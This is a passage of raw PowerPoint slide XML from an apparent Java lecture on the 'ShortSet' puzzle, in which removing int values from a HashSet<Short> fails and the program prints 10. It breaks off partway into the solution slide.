              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java.util.HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ShortSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  public static void main(String[] args) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;Short&gt; s = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;Short&gt;();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    for (int i = 0; i &lt; 10; i++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(short)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    System.out.println(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangular Callout 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="5625645"/>
            <a:ext cx="1447800" cy="495701"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -17313"/>
              <a:gd name="adj2" fmla="val -130582"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="292100" algn="l"/>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t>Prints 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="3391300"/>
            <a:ext cx="3733800" cy="418700"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60260"/>
              <a:gd name="adj2" fmla="val 10587"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="292100" algn="l"/>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t>Cast required</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t> to compile.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4523232" y="3948283"/>
            <a:ext cx="3392424" cy="404261"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -72995"/>
              <a:gd name="adj2" fmla="val -8058"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t>ries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t>to remove an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25762714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kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ShortSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Solution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java.util.HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ShortSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>static void main(String[] args) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;Short</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; s = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;Short</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(int i = 0; i &lt; 10; i++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((short)i);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remove a Short</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
